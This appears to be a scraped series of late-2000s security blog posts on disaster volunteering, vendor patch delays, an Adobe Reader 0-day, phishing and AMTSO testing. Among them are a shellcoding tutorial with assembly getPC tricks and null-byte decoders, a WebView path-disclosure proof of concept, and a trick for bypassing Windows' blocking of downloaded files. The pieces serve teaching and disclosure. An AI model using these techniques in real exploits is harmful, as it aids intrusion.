Haiti has been different.  The major factor has been the total breakdown of infrastructure, and the consequent difficulty in getting the help to those who need it most.

Those of us in the security communities are always interested in disasters.  We are forever dealing with crises, both large and small, assessing risks, planning and comparing mitigation strategies, and looking at the management of it all.  So, I recall that, when Katrina struck, there were endless discussions of the latest details, the structures, the organization (and lack thereof) in the followup efforts.  One person made a donation to a charity, and challenged the group to match his gift.  I upped the stakes.  I challenged everyone to get trained for disasters.

Unfortunately for the point I’m trying to make, I am speaking from a position of privilege.  Canada has the best emergency structure in the world.  (Our disaster response team is in Haiti at the moment, and is always one of the first on the ground whenever there is a major incident, anywhere.)  British Columbia has the best emergency response management system in Canada.  (No, I’m not volunteering at the Olympics.  But for the past year, I’ve been working with a group that has been planning for the fact that, with the big event in town, even a minor crisis is probably going to mean that we may have to provide emergency lodging for a few hundred people.)  And the North Shore, where I live, has the best disaster training regime in BC.  (The group lodging thing isn’t done by VANOC: it’s an effort by the ESS volunteers from the North Shore, Vancouver, and Richmond.)

Emergency response, in a major disaster, is not simply a matter of having water, generators, blankets, and rescue dogs.  It has to do with organization, co-ordination, management, and, particularly, trained people.  Most of them volunteers, since nobody can afford to pay for a full-time staff of all those you need to have ready in an emergency.

That’s where you come in.

Get trained.

There is some emergency measures organization that covers your area, regardless of where you live.  Your local municpality probably has an office.  And they probably need volunteers.  And they provide training.

If you volunteer, you will probably get trained.  For free.  (You may also get additional perqs.  I get my flu shots paid for every year, since I’m an emergency worker.)

First of all, you’ll probably get trained on what you need for you and your family.  What do you need to survive the first 72 hours following a disaster?  Do you know how much water, what type of food, etc, you need, in the event of a total failure of utilities and other factors we rely on?

Then there are the skills you need to help other people.  Sometimes this might relate to first aid, or structural assessment of buildings after an earthquake, etc.  However, there are many necessary skills that are not quite so dramatic.  Most emergency response, believe it or not, has to do with paperwork.  Who is safe?  Who needs care?  Do families need to be reunited?  Documentation of all of this is a huge effort, which goes on long after the bottles of water and hot meals have been distributed.

Then there are management skills, to co-ordinate all of the other skills.  An awful lot of “charity” gets wasted because some people get too much help, and others don’t get enough.  Someone needs to oversee the efforts.

Training in all of this is available.  And, in an emergency, having trained people is probably more important than having stockpiles of tents.  Trained people can make or improvise shelter.

Maybe your municipality or county doesn’t have a formal emergency structure.  In that case, there are organizations covering the gap.  In Canada, the government doesn’t do it all.  The Red Cross and Salvation Army are two of the groups that have been working on this for years, and have specialists.  In BC we have courses provided by the Justice Institute in a number of areas.  The provincial government has created a marvelous structure, ensuring consistent organizational layout for all sizes and types of disasters, and all types of response.  But we don’t bother reinventing the wheel.  In our formal training curriculum, a number of the courses are prepared, provided and run by the groups that have been doing it for years, and know it best.  If your government doesn’t have the courses available, go to those who do.  They are around.

(For those who have security related certifications, like the CISSP, ongoing professional education is a requirement.  A constant complaint is that training is expensive, and getting the credits costs too much.  I get all kinds of training related to business continuity and disaster recovery.  I get almost all of it free.)

Get trained.  Volunteer.  You’ll get a wealth of experience that will help you plan for all kinds of events, not just for major disasters, but for the minor incidents that plague us and our companies every day.  You’ll be ready for the big stuff, too.  You’ll be able to keep yourself and those near to you safe.  You’ll be able to make a difference to others, certainly reducing suffering, and possibly saving lives.  If and when something major happens, you will be a part of the infrastructure necessary for the response to be effective.  You’ll be part of the solution, rather than part of the problem.

-

Make your website safer. Use an external vulnerability scanner. Nothing to install, zero maintenance!

Even though this was acknowledged in September, and MS planned to ship the patch in a cumulative IE update next month, so that’s 6 months, really? Wow, I thought that Adobe had it tough with not having enough developers to patch
This really makes me question the worlds largest OS developer, I have to say. The following questions come to mind though.

- If this was passed to them last September, do they have that many bugs in their code that they haven’t gotten around to this one yet?

- What happened to MS’s secure development program if something like this can get missed?

-  As it’s the fault of a software development house that another 33 companies were hacked, will any legal action be taken against then for this?

- Will/Could Google sue MS for damages if they do decide to pull out of China because of this hack?

Just random thoughts, but hey…

-

Is your site safe from SQL Injection? Website Security Audit is the way to protect your network!

This is the statement from Adobe, which can be found here.

“We posted an update to Security Advisory APSA09-07 that reflects the target ship date of January 12, 2010 for the update to remediate vulnerability CVE-2009-4324. I thought folks might be interested in some of the analysis that went into developing the schedule for the fix, so let me share some of the details in this post.

We evaluated two different options for patching this vulnerability:

1. Stop everything else and start work immediately on an out-of-cycle security update to resolve this vulnerability with a one-off fix. We made major investments as part of our security initiative earlier this year that allow us to deliver patches more quickly. We estimated that delivering an out-of-cycle update would require somewhere between two and three weeks. Unfortunately, this option would also negatively impact the timing of the next quarterly security update for Adobe Reader and Acrobat scheduled for January 12, 2010.
2. Roll the fix for vulnerability CVE-2009-4324 into the code branch for the scheduled January 12, 2010 release. The team determined that by putting additional resources over the holidays towards the engineering and testing work required to ship a high confidence fix for this issue with low risk of introducing any new problems, they could deliver the fix as part of the quarterly update on January 12, 2010.
   

Two important considerations that contributed to our decision to select the second option:

• JavaScript Blacklist mitigation - This new feature, introduced in Adobe Reader and Acrobat versions 9.2 and 8.1.7, with the quarterly update in October, allows individuals as well as administrators of large enterprise managed desktop environments to easily disable access to individual JavaScript APIs. More details on the JavaScript Blacklist mitigation are available here. The feature design and our testing for this specific vulnerability indicate the JavaScript Blacklist is an effective mitigation against the threat without breaking other workflows that rely on JavaScript or other JavaScript APIs.




• Customer schedules - The next quarterly security update for Adobe Reader and Acrobat, scheduled for release on January 12, 2010, will address a number of security vulnerabilities that were responsibly disclosed to Adobe. We are eager to get fixes for these issues out to our users on schedule. Many organizations are in the process of preparing for the January 12, 2010 update. The delay an out-of-cycle security update would force on the regularly scheduled quarterly release represents a significant negative. Additionally, an informal poll we conducted indicated that most of the organizations we talked with were in favor of the second option to better align with their schedules.
  

This is just a brief description of some of the points we considered in our analysis. Ultimately, the decision came down to what we could do to best mitigate threats to our customers, a critical priority to everyone at Adobe - and one we take very seriously.”

I can really see how they are taking this one seriously, as 4 weeks to roll out a critical patch to one of the most widely used applications on the planet really isn’t that bad if you think it, as that’s got to be at least 2 people working on this one. I actually thought that Adobe had more than a couple of developers, but I guess I was wrong.

-

Make your website safer. Use an external vulnerability scanner. Nothing to install, zero maintenance!

SecuriTeam Blogs contains several FAQ documents about MS Office vulnerabilities used in targeted attacks since 2006. This time I’m not writing a FAQ. This document has answers to What this means type questions.

What an organization can make to protect?

#1 Disable JavaScript. Deploy a system to deliver this setting to all workstations. This is not the last Adobe 0-day which we will see.

What this means?

Go to Edit>Preferences menu, select item ‘JavaScript’, Uncheck “Enable Acrobat JavaScript” and to save the setting click ‘OK’.

#2 Enable DEP

Some Windows systems include Data Execution Prevention (DEP) functionality.

What this means?

If your organization is using Windows versions with DEP support the code execution can be avoided.

Adobe has confirmed these mitigation advices in security advisory APSA09-07, but as mentioned DEP method doesn’t fully prevent the exploitation.

#3 Do not open PDF documents from unknown sources AND received unexpectedly.

What this means?

If you don’t know the sender who is sending you file attachments there is always a risk that you are a victim of targeted attack. Remember that the sender can be easily spoofed as well.

#4 Switch to alternative PDF reader.

There are many free and commercial products. However, they are often affected by Adobe vulnerabilities too and a patching policy is needed when switching to another product.

What this means?

Changing the PDF reader in large organization is not an easy move. Today is a good day to start the planning project.

Let’s talk about technical details with some words. The vulnerability exists in Doc.media.newPlayer method. The Trojan in these attacks generated connections to http: // foruminspace dot com and http: // newsplaza dot net (these servers are located in Malaysia).

AV vendors use the following names when detecting the malicious PDF document:

Exploit.JS.Pdfka.atq (Kaspersky)

Exploit:W32/AdobeReader.UZ (F-Secure)

Exploit-PDF.ag (McAfee)

PDF/Pidief.NQ (CA)

Trojan.Pidief.H (Symantec)

TROJ_PIDIEF.PGS (Trend Micro)

Troj/PDFJs-FS (Sophos)

The size of the infected PDF document is 400,918 bytes. The file name varies, but it can be note200911.pdf, note_20091210.pdf or Outline of Interview.pdf.

-

Let the experts make sure your website is safe. Vulnerability Assessment is the answer.

“Adobe PDF 0.9-day added to Metasploit: [msf> use exploit/windows/fileformat/adobe_media_newplayer.rb] (via jduck/pusscat/myself) SVN r7881″

Night All…

-

Is your site safe from SQL Injection? Website Security Audit is the way to protect your network!

A common sight when looking for exploitation information is complicated c-and-ugly-assembly-string exploit or shellcode.  Rather than writing up another the 287637639th exploit, I will discuss different problems and goals faced when exploiting and shellcoding.  My main focus will be explaining problems and issues often encountered and a offering simple, general approaches to a solution with an emphasis on working, easy-to-implement solutions.

Rather than building a full(”weaponized”) exploit i will go through the process of building a PoC.  Also, i may feel free to talk about some simple and effective ways of building an exploit-compilation framework.

I like to start from the beginning, but even seasoned exploiters can already prepare themselves for some surprises and twists.

SHELLCODING PRIMER

One of the main problems encountered when exploiting a vulnerability -  even if is is a simple stack overflow - is shellcode restrictions.  often, the nature of the specific vulnerability will prevent us from using specific bytes or force us to use certain combinations.  obviously, every constraint is different. let’s start with the classic  “zero-tolerance” restraint.  This means that our shellcode can not contain null bytes because it was probably originally part of a printable string.

This type of constraint is indeed a classic, text book, example, but is also a common problem in real-world shellcode writing and exploitation. This is very common in vulnerabilities surrounding textual streamds, such as html, xml, telnet and others  (Often these streams can be encoded in unicode but this creates different problems).

In the October patch-Tuesday alone we can find  that many vulnerabilities - especially those in ms09-054  - may require dealing with these limitations (when not serving a unicode-encoded webpage). This is the case with CVE-2009-2529, with some implementations of an exploit for CVE-2009-2530.  This is probably also the case for CVE-2009-2531 and many other vulnerabilities.

If you have never tackled this problem before, stop reading here, and think of  how you would solve this problem.

The answer is of course  a decoder. there are many examples of byte-substitution decoders out there written in hundreds of lines of C.
let’s see what the basic concept behind these is. We want to write code that does not concatenate any null-bytes. therefore we will obviously have to substitute the null-bytes  for something  different, or escape them. does substitution really cut it?

A quick histogram of all the code in kernel32.dll(or choose any other simple dll) shows us that some bytes tend to appear much less in code and printable data.
we can simply histogram our shellcode (use hex workshop) and choose a magic byte to replace.
[picture-histogram]

let’s see what the stages we need to take in order to decode our shellcode. I won’t talk about  OS-specific issues but they are mentioned
- find the position we are running from (aka getPC)
- deal with memory-permission issues
- rewrite our code

Locating home

Finding the position we are running from in order to be able to decode the shellcode, we must first be able to find it. unfortunately x86 does not allow direct access to eip (ia-64 does somewhat . we must find it indirectly. we have several methods of accomplishing this, each with benefits and drawbacks. i am already assuming no null bytes allowed.

We can use the CALL opcode, which will push our  position on to the stack

A naive method using call:
_SIMPLE_CALL_GETPC_
jmp START_GA;
@GET_ADDR:
pop edi;                // get the address that was pushed on to the stack
add edi,(@START_CODE-@RET_ADDR);   //here we calculate our needed address
jmp DECODE;
@START_GA:
call GET_ADDR;        //this will push address of @RET_ADDR on to stack. decodes as “E8FFFF… ”
@RET_ADDR:             //this address will be pushed
@END_GA:
@DECODE:
[decoder goes here]
@START_CODE

or we can use a slightly more sophisticated method:

_CALL_IN_TO_OPCODE_
@GET_ADDR:
call @AFTER_CALL- 1 (call $-1)  == “E8FFFFFFFF”
@AFTER_CALL
db  ‘0xC8′
inc eax
@RET_ADDR:
pop edi
add edi,(@START_CODE-@RET_ADDR)

@END_GA:
@DECODE:
[decoder goes here ]
@START_CODE

What I did here is call in to the call opcode itself . this way the call will be to end-of-opcode-1, which will result in an opcode-encoding that does not contain null bytes, but 0xFFFFFFFF. this is because part of the opcode contains the jump distance and direction. in this case, -1. After the call an ‘dec eax’ (”FFC8″) opcode will be executed.  I could have easily executed a slightly different opcode, but this is fairly harmless, and after addein an ‘inc eax’  this will result in a fancy NOP.

Another option would be to  just use an existing function that can be called(eg. from windows using syscall gateway)
_CALL_EXISTING_FUNCTION_
xor eax,eax
push eax
add eax, 0×3E ; // this can be changed for anything which will not cause damage on specific OS. in this case ntclosefile(NULL);
mov edx,  7FFE0301 // windows “syscall gateway” pointer
dec edx
mov edx, [edx]
call edx        //this will perform an os-specific syscall
@RET_ADDR:
mov edi, [esp-4]
add edi,(@START_CODE-@RET_ADDR)
@END_GA:
@DECODE
[decoder]
@START_CODE

That’s about it for using call. another nice trick is using some fpu opcodes

fld1
FSTENV  [ESP-C] //push fpu state onto stack, including last address of last run fpu opcode. this can be replace by FSAVE/FSTENV/FXSAVW/some other?
pop edi
add edi….

A completely different approach would be to copy our code to a know place. lets choose 7FFE0410 for windows (assuming no nx-bit is present, we know space is not int use, also disregarding the fact that we cannot in reality write to this address, as it is read-only from user mode).
_COPY_THE_CODE_
mov eax, 0×7FFE0410 (7FFE0300+0×110)
[eax = shellcode_postion]
mov dword ptr [eax], 0×90909090 //NOPNOPNOPNOP - the prefect shellcode jmp/call eax

When copying a larger shellcode this will not be very compact/ in order to use string operations, we will have to getPC.  A variant of this method is the famous “seh method” , which essentially does the same, except it will use an interrupt to eventually jump to where the code was copied.

Decoding
Now that we have found our own code base- we can replace our escaped, or replaced bytes.  these are two simple - hack decoders which are easy to implement, and are good enough in many cases. These will only work if we have a byte value which does not appear in the code/data as I discussed above.

XOR_IT_ALL:

jmp START_GA
@GET_ADDR:
pop edi
add edi,(@END-@RET_ADDR)
jmp DECODE
@START_GA:
call GET_ADDR

@RET_ADDR:
@DECODE:

xor ecx,ecx
add ecx,@END_CODE-@END_DECODER  ;smaller than 0×7f. can be done multiple times
mov al, 0xA7

@REPLACE_NEXT:
mov byte ptr bl,[edi]
xor bl,al
inc edi
mov byte ptr [edi],bl
loop @REPLACE_NEXT

@END_DECODER :
NOP
NOP
NOP
NOP
NOP
@END_CODE:

Here we xor’d the whole code with the magic byte. If this magic byte did not exist in original code, than 0×00 would not exist in encoded code. A different method:

SEARCH_AND_DESTROY:
jmp START_GA
@GET_ADDR:
pop edi
add edi,(@END-@RET_ADDR)
jmp DECODE
@START_GA:
call GET_ADDR

@RET_ADDR:
@DECODE:

xor ecx,ecx
add ecx,@END_CODE-@END_DECODER;smaller than ox7f. can be done multiple times
cld
mov al, 0xA7
xor dl,dl

@REPLACE_NEXT:

repnz scasb
mov byte ptr [edi-1],dl
test ecx,ecx
jnz replace_next:
@END_DECODER
NOP
NOP
NOP
NOP
NOP
@END_CODE

in order to build a more robust decoder, which supports escaping, or alphanumeric encoding it is possible to write one from scratch in assembly. Skilined has written a very elegant decoder at http://skypher.com. Another option is and have a small-hack-custom-adapt decoder like the one we just wrote to decode a bigger decoder written in C.in the next upcoming post… i will show how i tried (and succeeded) in building shellcode which has gone through a process of ascii-to-unicode conversion. This shellcode will have to be written so that every second byte, and only every second byte will be a null-byte. try this at home. let me know if you have anything good.

leaving you with one more point for thought.. shellcode that will run on x86 and on x64..

-

Expose the security holes in your products during development. Black Box Testing makes it safer!

It looked like:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Rafel>nmap -PN -sS -p 445 192.168.1.*

Once I pressed “Enter” I got:
Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-11-10 00:34 Jerusalem Standard Time
WARNING: Using raw sockets because ppp0 is not an ethernet device. This probably won’t work on Windows.

pcap_open_live(ppp0, 100, 0, 2) FAILED. Reported error: Error opening adapter: The system cannot find the device specified. (20). Will wait 5 seconds then retry.

pcap_open_live(ppp0, 100, 0, 2) FAILED. Reported error: Error opening adapter: The system cannot find the device specified. (20). Will wait 25 seconds then retry.

Call to pcap_open_live(ppp0, 100, 0, 2) failed three times. Reported error: Error opening adapter: The system cannot find the device specified. (20)

There are several possible reasons for this, depending on your operating system:
LINUX: If you are getting Socket type not supported, try modprobe af_packet or recompile your kernel with SOCK_PACKET enabled.

*BSD: If you are getting device not configured, you need to recompile your kernel with Berkeley Packet Filter support. If you are getting No such file or directory, try creating the device (eg cd /dev; MAKEDEV ; or use mknod).

*WINDOWS: Nmap only supports ethernet interfaces on Windows for most operations because Microsoft disabled raw sockets as of Windows XP SP2. Depending on the reason for this error, it is possible that the — unprivileged command-line argument will help.

SOLARIS: If you are trying to scan localhost or the address of an interface and are getting ‘/dev/lo0: No such file or directory’ or ‘lo0: No DLPI device found’, complain to Sun. I don’t think Solar is can support advanced localhost scans. You can probably use “-PN -sT localhost” though.

QUITTING!

Then I realized that the VPN connection was a PPP device which is probably at the top of the device type interfaces order list and Nmap is trying to use it in order to scan, which is the point of failure because Nmap on Windows without RAW sockets (means Windows XP SP2+) can only use Ethernet devices. So I try played “Imaginary Linux on Windows” and added the option “-e eth0″ which specifies using the Ethernet device indexed at 0 and it worked like a charm.

C:\Documents and Settings\Rafel>nmap -PN -sS -p 445 -e eth0 192.168.1.*

Starting Nmap 5.00 ( http://nmap.org ) at 2009-11-10 00:49 Jerusalem Standard Time
Interesting ports on XXXXX (192.168.0.1):
PORT STATE SERVICE
445/tcp filtered microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 6.03 seconds

-

Make your website safe from SQL Injection attacks. Signup for a daily penetration testing to protect your network!

Me: “Honey, go to http://www.teamviewer.com, can you download it?”
Her: “yes, but when I run the setup.exe it says something weired like ‘windows has blocked this software because it can’t verify the publisher’ and it won’t let me install”


Me: “O.K, Open Start-Run, type notepad and space, now click on setup.exe and drag it to the text box at Start->Run. Now add ‘:Zone.Identifier’ just before the last quotes. What do you see?”
Her: “I see something like ZoneId=3, now what?”
Me: “I can’t talk, going into a meeting, try to change it to 1 or delete everything, bye bye bye”

After 10 minutes I get an SMS “thanks honey it worked!!!”.
Well we found a bug, I wouldn’t really call it a “Privilege Escalation” but I guess you don’t have to be a hacker to bypass windows security restrictions

-

Is your site safe from SQL Injection attacks? Use an SQL Injection Scanner on a daily basis to protect your network!

In Windows 98 a new look was introduced called “WebView” which included the way folders are displayed and the way the desktop is displayed are all HTML templates which were also editable to the default administrative user.You can read more about it here:http://msdn.microsoft.com/en-s/library/bb776835(VS.85).aspx

Those HTML Templates had the extension “htt”. In order for the folder templates to function properly and being able to display the current folder, a few automatically expended variables were added to the module filtering the “htt” files. These are:
%TEMPLATEDIR% (hardcoded)
%THISDIRPATH% (hardcoded)
%THISDIRNAME% (hardcoded)
%BACKGROUNDIMAGE% (registry)
%LOGOLINE% (registry)

This mechanism lives until today deeply inside Windows XP’s code in two modules inside the system32 folder:

    1) Webvw.dll
    2) Mshtml.dll

Webvw.dll is the module which is responsible for all the Webview installation and normal activity and mshtml.dll is the main module for HTML Filtering & Rendering used Windows Explorer and Internet Explorer.

When Microsoft Windows is installed and webvw.dll is registered, it adds it CLSID and a few registry keys. The interesting ones are these:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
WebView\TemplateMacros
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
WebView\TemplateMacros\BACKGROUNDIMAGE
Default = “%SystemRoot%\Web\wvleft.bmp”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
WebView\TemplateMacros\LOGOLINE
Default = “%SystemRoot%\Web\wvline.gif”

Every time an htt file is rendered, without any local-remote or any zone consideration, those variables are replaced with the current system’s path.
This is the code inside mimeflt.cpp which contains the bug:Lines 360 to 433:

#define REG_WEBVIEW_TEMPLATE_MACROS
TEXT("Software\Microsoft\Windows\CurrentVersion\Explorer\
WebView\TemplateMacros")

void ConvertBytesToTChar(LPCBYTE pBuf, UINT nCharSize, LPTSTR psz, int cch) {

    if (SIZEOF(char) == nCharSize) {
         SHAnsiToTChar((LPCSTR)pBuf, psz, cch);
    } else {
        ASSERT(nCharSize == SIZEOF(WCHAR));
         SHUnicodeToTChar((LPCWSTR)pBuf, psz, cch);
    }
}

void ExpandMacro(LPBYTE pszMacro, LPBYTE pszExpansion, int nBytes, UINT nCharSize) {

    TCHAR szExpansion[MAX_PATH];
    szExpansion[0] = TEXT('');
    TCHAR szTCharMacro[MAX_PATH];

    ConvertBytesToTChar(pszMacro, nCharSize, szTCharMacro, ARRAYSIZE(szTCharMacro));
    TCHAR szKey[MAX_PATH];
    lstrcpyn(szKey, REG_WEBVIEW_TEMPLATE_MACROS, ARRAYSIZE(szKey));
    StrCatBuff(szKey, TEXT("\"), ARRAYSIZE(szKey));
    StrCatBuff(szKey, szTCharMacro, ARRAYSIZE(szKey));
    HKEY hkMacros;

    if (RegOpenKey(HKEY_CURRENT_USER, szKey, &hkMacros) == ERROR_SUCCESS && RegOpenKey(HKEY_LOCAL_MACHINE, szKey, &hkMacros) == ERROR_SUCCESS) {
        DWORD dwType;
        DWORD cbData = SIZEOF(szExpansion);
        SHQueryValueEx(hkMacros, NULL, NULL, &dwType, (LPBYTE)szExpansion, &cbData);
        RegCloseKey(hkMacros);
    }

    ConvertTCharToBytes(szExpansion, nCharSize, pszExpansion, nBytes);
}

int CWebViewMimeFilter::_Expand(LPBYTE pszVar, LPBYTE * ppszExp) {
    if (!_StrCmp(pszVar, "TEMPLATEDIR", L"TEMPLATEDIR")) {
        if (!_szTemplateDirPath[0]) {
            GetMachineTemplateDir(_szTemplateDirPath, SIZEOF(_szTemplateDirPath), _nCharSize);
         }

         *ppszExp = _szTemplateDirPath;

    } else if (!_StrCmp(pszVar, "THISDIRPATH", L"THISDIRPATH")) {
        if (!_szThisDirPath[0]) {
            _QueryForDVCMDID(DVCMDID_GETTHISDIRPATH, _szThisDirPath, SIZEOF(_szThisDirPath));
        }
        *ppszExp = _szThisDirPath;

    } else if (!_StrCmp(pszVar, "THISDIRNAME", L"THISDIRNAME")) {
        if (!_szThisDirName[0]) {
            _QueryForDVCMDID(DVCMDID_GETTHISDIRNAME, _szThisDirName, SIZEOF(_szThisDirName));
        }
        *ppszExp = _szThisDirName;

    } else {
        ExpandMacro(pszVar, _szExpansion, SIZEOF(_szExpansion), _nCharSize);
        *ppszExp = _szExpansion;
    }

    return _StrLen(*ppszExp);
}

In Windows XP the variables “%THISDIRPATH%” and “%THISDIRNAME%” were removed from the Mime Filter which means %TEMPLATEDIR%, %BACKGROUNDIMAGE% and %LOGOLINE% would still be translated into the current windows directory.

The Proof Of Concept code (Remote WebView Macro Translation):
Save on a remote host with an htt extension and replace “http:///filter_trap.htt

--------------------------- filter_trap.htt start ------------------
[div id="BACKGROUNDIMAGE"]%BACKGROUNDIMAGE%[/div]
[div id="LOGOLINE"]%LOGOLINE%[/div]
[div id="TEMPLATEDIR"]%TEMPLATEDIR%[/div]
[script]
alert(document.getElementById("BACKGROUNDIMAGE").innerHTML);
alert(document.getElementById("LOGOLINE").innerHTML);
alert(document.getElementById("TEMPLATEDIR").innerHTML);
[/script]
--------------------------- filter_trap.htt end -------------------

Microsoft was notified a few months ago, the problem will be fixed.

-

Expose the security holes in your products during development. Black Box Testing makes it safer!

Hackers don’t, as a rule, need to go to such lengths to crack passwords. That’s because most of us fail to follow good security habits. A recent article on PhysOrg cites a study that found people are the weak link in computer security.

This is silly. People don’t need to “follow good security habits” unless they have “security” somewhere in their title. Security is a means to an end, and not the target. The target is to get the job done (or surf the web, or read your emails).

Saying this is not just silly - it’s also dangerous. When experts say “people are the weakest link in computer security”, they remove all responsibility from the security industry to make security better, and easier, for users. Why work on preventing brute-force attacks on passwords? Instead lets force our users to choose a 10 character password including at least 1 number and 1 letter of each case. Oh, and lets prevent those walking security hazards from saving the password in the browser on their malware infested machines. Yeah, that’ll teach them. The article over at discovery.com suggests I use e$4WruX7 as a password - a most helpful advice if I ever saw one. Here’s a better suggestion for you Jonathan: have the system lock out for 24 hours after 3 failed tries.That will make guessing a simple 6 digit-only PIN take more than 450 years.

Enough with this.  Users are not the weakest link any more than drivers are the weakest link in driving accidents. Sure, if we remove users (or drivers) from the equation, that solves all our problems. But since we can’t do that, lets focus on making seat belts, and airbags, and warning systems. Or easier (not harder!) password systems, better protected servers and better user interface.

-

Make your website safer. Use an external vulnerability scanner. Nothing to install, zero maintenance!

Link: 911.wikileaks.org/

Listings say that the messages are sent in networks of Arch Wireless, Metrocall, and SkyTel.

-

Make your website safer. Use an external vulnerability scanner. Nothing to install, zero maintenance!

[Most of the address fields spoofed a US educational institution, though the reply-to was an address in China.]

Message Body:

You have won 1,000,000.00 Reply us with  your  details
Name:Occupation:Country:Sex

[This message is actually several weeks old, but I just spotted it while cleaning up one of my mailboxes. Could any potential victim honestly be that naive?]

David Harley FBCS CITP CISSP
Director of Malware Intelligence, ESET

Also blogging at:
http://dharley.wordpress.com/
http://www.eset.com/threat-center/blog
http://avien.net/blog
http://blog.isc2.org/

-

Make your website safe from SQL Injection attacks. Signup for a daily penetration testing to protect your network!

Going back to cheesy analogies this is the age old question, can god create a stone so heavy that he cannot lift?

The case in question is HP buying 3COM (which owns the Zero Day initiative), and as HD Moore correctly pointed out there’s bound to be some conflict there.
This will be an interesting match to watch. First, the stone is very heavy. Knowing the ZDI team (*) they have been very successful at staying independent inside the huge 3com corporate, and my money would be on them succeeding to do it again.

But when we ask if HP can lift this proverbial stone, lets remember that HP was the only large vendor to pull out the nuclear weapon of threatening to sue a security researcher for making their flaws public. Now it’s a group within their own organization, selling information about unfixed HP flaws to paying customers, and paying the same researchers HP wanted to sue 7 years ago.

(*) Full Disclosure: We run an alternative service to ZDI called SecuriTeam Secure Disclosure. That doesn’t take anything from my respect to the ZDI guys and what they’ve been doing.

-

Is your site safe from SQL Injection attacks? Use an SQL Injection Scanner on a daily basis to protect your network!

Last month I received an email message from American Express.  I very nearly deleted it unread: it was obviously phish, right?  (I was teaching in Toronto that week, so I had even more reason to turf it unread rather than look at it.)

However, since I do have an Amex card, I decided to at least have a look at it, and possibly try and find some way to send it to them.  So I looked at it.

And promptly freaked out.

The phishers had my card number.  (Or, at least, the last five digits of it.)  They knew the due date of my statement.  The knew the balance amount of my last statement.

(The fact that this was all happening while I am aware from home wasn’t making me feel any more comfortable with it …)

So I had a look at the headers.  And couldn’t find a single thing indicating that this wasn’t from American Express.

(I had paid my bill before I left.  Or, at least, I *thought* I had.  So I checked my bank.  Sure enough, that balance had been paid a couple of days before.  However, I guess banks never actually transfer money on the weekend or something …)

A couple of days later I got another message: Amex was telling me that my payment was received.  That’s nice of them.  They were once again sending, in an unencrypted email message, the last five digits of my card number, and the last balance paid on my account.

Well, I figured that it might have been an experiment, and that they’d probably realize the error of their ways, and I didn’t necessarily need to point this out.  Apparently I was wrong on all counts, since I got another reminder message today.

Are these people completely unaware of the existence and risk of phishing?  Are they so totally ignorant of online security that they are encouraging their customers to be looking for legitimate email from a financial institution, thus increasing the risk of deception and fraud?

Going to their Website, I notice that there is now an “Account Alerts” function.  It may have been there for a while: I don’t know, since I’ve never used it.  Since I’ve never used it, I assume it was populated by default when they created it.  It seems to, by default, send you a payment due notice a week before the deadline, a payment received notice when payment is received, and a notice when you approach your credit limit.  (Fortunately, someone had the good sense not to automatically populate the option that sends you your statement balance every week.)  These options may be useful to some people.  But they should be options: they shouldn’t be sending a bunch of information about everybody’s account, in the clear, by default.

(There are, of course, “Terms and Conditions” applicable to this service, which basically say, as usual, that Amex isn’t responsible for much of anything, have warned you, and that you take all the risks arising from this function.  I find this heavily ironic, since I knew nothing of the service, don’t want it, and got it automatically.  I never even knew the “Terms and Conditions” existed, but in order to turn the service off I’ll have to read them.)

(In trying to send a copy of this to Amex, I note that their Website only lists phone and snailmail as contact options, you aren’t supposed to be able to send them email.)

-

Make your website safer. Use an external vulnerability scanner. Nothing to install, zero maintenance!

This of course will not hit CNN, FOX, or any other news agency, and will be posted on, usually, underground mailing list or blog which might or not have a hidden agenda in respect to giving out such news items.

This if of course not the first time someone was claimed to have died, with only rumours circulating and then finally after some time, it was determined to be true, as their site was no longer being updated, and emails sent to him never got a reply.

If it is in fact true, the story about str0ke, I am sadden to hear it, and I send my condolences to his family, wife and 4 kids.

-

Let the experts make sure your website is safe. Vulnerability Assessment is the answer.

So I’m going to ask some hypothetical questions instead.

Principle 3 of the AMTSO (Anti-Malware Testing Standards Organization) guidelines document (http://www.amtso.org/amtso—download—amtso-fundamental-principles-of-testing.html) states that “Testing should be reasonably open and transparent.”

The document goes on to explain what information on the test and the test methodology it’s reasonable to ask for.

So is it open and transparent for an anti-malware tester who claims that his tests are compliant with AMTSO guidelines to decline to answer a vendor’s questions or give any information about the reported performance of their product unless they buy a copy of the report or pay a consultancy fee to the tester?

There is, of course, nothing to stop an anti-malware tester soliciting payment from the vendors whose products have been tested both in advance of the test and in response to requests for further information. But is he then entitled to claim to be independent and working without vendor funding? In what respect is this substantially different to the way in which certification testing organizations work, for example?

It seems to me that AMTSO is going to have to consider those questions at its next meeting (in Prague, next week). Purely hypothetically, of course. What do you think?

David Harley CISSP FBCS CITP
Small Blue-Green World

-

Is your site safe from SQL Injection? Website Security Audit is the way to protect your network!